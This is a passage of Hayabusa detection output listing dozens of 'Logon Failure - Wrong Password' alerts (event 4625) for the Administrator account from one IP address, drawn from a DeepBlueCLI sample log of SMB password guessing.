NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.635 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.722 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.809 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.938 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.026 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.165 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.338 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.382 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.426 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.635 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.955 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.273 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.534 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.575 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.734 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.913 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.157 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.242 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.334 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.474 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.517 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.738 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.969 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.063 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.145 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 